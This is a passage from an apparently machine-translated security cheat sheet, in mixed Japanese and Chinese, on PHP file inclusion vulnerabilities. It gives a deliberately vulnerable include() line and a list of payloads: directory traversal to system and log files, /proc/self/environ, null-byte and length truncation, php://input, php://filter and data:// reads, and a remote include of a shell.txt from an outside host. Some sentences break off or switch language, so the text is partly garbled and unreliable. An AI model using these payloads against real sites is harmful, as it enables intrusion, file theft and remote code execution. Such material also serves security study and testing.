4.9.ファイルインクルード

4.9.1。基本

一般的なファイルには、次の形式の脆弱性が含まれています<?php include("inc/" . $_GET['file']); ?>

一般的に使用されるいくつかの包含方法を次のように考えます。

同じディレクトリに含まれていますfile=.htaccess
ディレクトリトラバーサル?file=../../../../../../../../../var/lib/locate.db
ログインジェクション?file=../../../../../../../../../var/log/apache/error.log
利用/proc/self/environ

ログは、SSHログやWebログなどのさまざまなログソースを使用してテストできます。

4.9.2。シンクのトリガー

PHP

    include
        在包含过程中出错会报错，不影响执行后续语句

    include_once
        仅包含一次

    require
        在包含过程中出错，就会直接退出，不执行后续语句
    require_once

4.9.3。バイパステクニック

一般的なアプリケーションは、ファイルが含まれる前にファイルを判断する関数を呼び出す場合があります。一般に、次のようないくつかのバイパス方法があります。

4.9.3.1。URLエンコードバイパス

WAFに文字列一致がある場合は、urlエンコード方式を使用して

4.9.3.2。特殊文字のバイパス

某些情况下，读文件支持使用Shell通配符，如 ? * 等
url中 使用 ? # 可能会影响include包含的结果
某些情况下，unicode编码不同但是字形相近的字符有同一个效果

4.9.3.3。％00の切り捨て

magic_quotes_gpc閉じられており、phpバージョンが5.3.4未満である場合、ほとんど最も一般的な方法です。

4.9.3.4。長さの切り捨て

Windowsでのファイル名の長さは、ファイルパスに関連しています。具体的な関係は次のとおりです。ルートディレクトリから計算すると、ファイルパスの最大長は259バイトです。

msdn定義#define MAX_PATH 260、260番目の文字は文字列の終わりであり\0、Linuxはgetconfを使用して、ファイル名の長さの制限とファイルのパスの長さの制限を決定できます。

最長のファイルパス長を取得します：getconf PATH_MAX / root get 4096最長のファイル名を取得します：getconf NAME_MAX / root get 255

次に、長さが制限されている場合、././././（n）フォームはこれを通るパスを爆発させることができます

phpコードインクルードでは、このバイパスにはphpバージョン<php5.2.8が必要です

4.9.3.5.偽のプロトコルバイパス

远程包含: 要求 allow_url_fopen=On 且 allow_url_include=On ， 
payload为 ?file=[http|https|ftp]://websec.wordpress.com/shell.txt 的形式

PHP input: 把payload放在POST参数中作为包含的文件，
要求 allow_url_include=On ，payload为 ?file=php://input 的形式

Base64: 使用Base64伪协议读取文件，
payload为 ?file=php://filter/convert.base64-encode/resource=index.php 的形式

data: 使用data伪协议读取文件，
payload为 ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= 的形式，
要求 allow_url_include=On

4.9.3.6.プロトコルバイパス

allow_url_fopen 和 allow_url_include 主要是针对 http ftp 两种协议起作用，因此可以使用SMB、WebDav协议等方式来绕过限制。

[侵入テスト]-ファイルインクルードの方法を使用して攻撃する方法